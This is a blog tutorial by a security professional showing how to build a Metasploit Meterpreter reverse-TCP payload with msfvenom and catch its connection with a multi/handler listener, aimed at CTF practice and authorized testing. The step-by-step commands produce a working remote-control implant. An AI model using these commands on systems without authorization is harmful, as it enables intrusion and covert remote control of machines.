Metasploit has a ton of functionality related to customizing exploits, but many people use it primarily for its post-exploitation command-and-control (C2) capability. Using Metasploit’s Meterpreter can be really useful for anyone playing one of the many CTF virtual machines on VulnHub.com or a CTF at a conference.
In my most recent webinar—where I demonstrated an attack on a Batman Forever-themed single-player capture the flag (CTF) virtual machine—a live attendee asked about the commands I was using to set up Metasploit as a command-and-control (C2) framework. So, that’s the genesis for this blog.
Read on for a step-by-step walkthrough of how to use Metasploit for command and control, so you can use it in your own CTF experiences or authorized hacking.
Setting up Metasploit for command and control
As an attacker, you usually get your initial access either from phishing or by achieving remote code execution on a target system. In short, you’re able to run a command on a target computer.
For more convenience and capability, you install a C2 agent that brings other useful capabilities to allow you to maintain more persistent control, escalate privileges and potentially execute lateral movement throughout a network.
Metasploit’s Meterpreter is the universal classic C2 agent, packaged with a ton of community-contributed tools. Let’s see how it works.
First, we’ll use the msfvenom command to customize a Meterpreter. We’ll build up a single command line over multiple steps. Only the last msfvenom command shown here will be complete.
In my recent demo-heavy Batman-themed CTF webinar, as in most of my talk demos and training classes, I use a Kali Linux system and set the parameters to make an x86-compatible Linux binary that will “phone home,” or connect back to my Metasploit console. This is the “reverse TCP” mode. So, our msfvenom command will need to specify that we want an x86 Linux-compatible Meterpreter using the “reverse_tcp” method for connecting. That all goes into a single parameter, like so:
msfvenom -p linux/x86/meterpreter/reverse_tcp
Is that it? No, since the Meterpreter hasn’t been told what IP address or TCP port it can connect back to. We set these with two parameters, LHOST and LPORT. The “L” denotes our “local” Metasploit console, in contrast to “R” for remote. To make this easy to follow and test yourself, let’s set LHOST to 127.0.0.1, so you can run this test Meterpeter on the same system as your Metasploit console.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444
Here’s a trick – we can leave out “LPORT,” and let it use the default TCP port: 4444.
We need to set two more parameters. The first is “-f” for “file format.” Msfvenom can make files that run on multiple operating systems and can even make scripts, instead of binaries. We’ll ask for Linux’s standard binary format, the executable and linking format (ELF) using “-f elf”.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 -f elf
Finally, we need to tell msfvenom to write this payload to a file, instead of writing it out to the screen. We use the “-o” parameter to specify an output file path, resulting in the actual usable msfvenom command:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 -f elf -o meterpreter
After a few seconds, we’ll see that we have a new file called meterpreter.
So, we’ve created a Meterpreter that can connect back to a Metasploit console. Now, we need to start up a Metasploit console and tell it to listen for this Meterpreter. First, we run msfconsole at a command line:
msfconsole
Next, we tell it that we’d like to use the generic payload handler, the “multi-handler” module.
use exploit/multi/handler
We need to tell the multi-handler what payload type is connecting back, using the same value we used in our msfvenom command:
set PAYLOAD linux/x86/meterpreter/reverse_tcp
We need to tell the multi-handler what IP address to listen on – this will correspond to the LHOST value we set in our msfvenom command:
set LHOST 127.0.0.1
Finally, we run “exploit” to start this module, passing the “-j” option to make this a background job, allowing us to continue running other commands in Metasploit, if we like.
exploit -j
Let’s test this out by starting another shell or terminal window on the same system so we can run the Meterpreter and see it connect back to us. We start a new window, make the Meterpreter executable and run it.
chmod u+x meterpreter
./meterpreter
If you switch back over to your Metasploit console window, you’ll see that you have a Meterpreter session waiting for you. You can interact with it using the session command.
sessions -i 1
To see all the things that Meterpreter can do, use the help command:
help
Take a look at this list! You can upload and download files, set up port forwarders to proxy traffic through the remote system, and even play music on the remote system’s speakers. There are multi-tasking features to make it easier to run multiple programs and even to control multiple systems from one Metasploit console. It’s very useful!
You can use what you’ve just learned to repeat the attack from the webinar, so please go watch the “Linux Attack and Defense: Batman Edition” webinar. There’s a fun and challenging attack path on this one, filled with a riddle and other bits of throwback humor. You can watch the on-demand webinar, then download the virtual machine to try the attack path yourself. Watch my Twitter @jaybeale or Mastodon (@jaybeale@infosec.exchange) feeds for the Batman virtual machine download!
Linux Security - Related Resources
Attacking and Defending Linux: Breaking out of the Matrix Edition (webinar with Jay Beale)
Why is Log Integrity so Important for Unix & Linux Security? (blog)
Unix/Linux Privilege Management: Should You Sudo? Here’s What It Does and Why It’s Not Enough. (blog)
15 Server Privilege Management Use Cases for Unix & Linux (white paper)
Jay Beale, CEO, CTO at InGuardians, Inc.
Jay Beale is CTO and CEO for InGuardians. He works on Kubernetes, Linux and Cloud-Native security, both as a professional threat actor and an Open Source maintainer and contributor. He's the architect of the open source Peirates attack tool for Kubernetes and Bustakube CTF Kubernetes cluster. Jay helps create and run DEF CON's Kubernetes CTF, is a member of the Kubernetes organization, and previously co-led the Kubernetes project's Security Audit Working Group. Since 2000, he has led training classes on Linux & Kubernetes security at public conferences and in private training.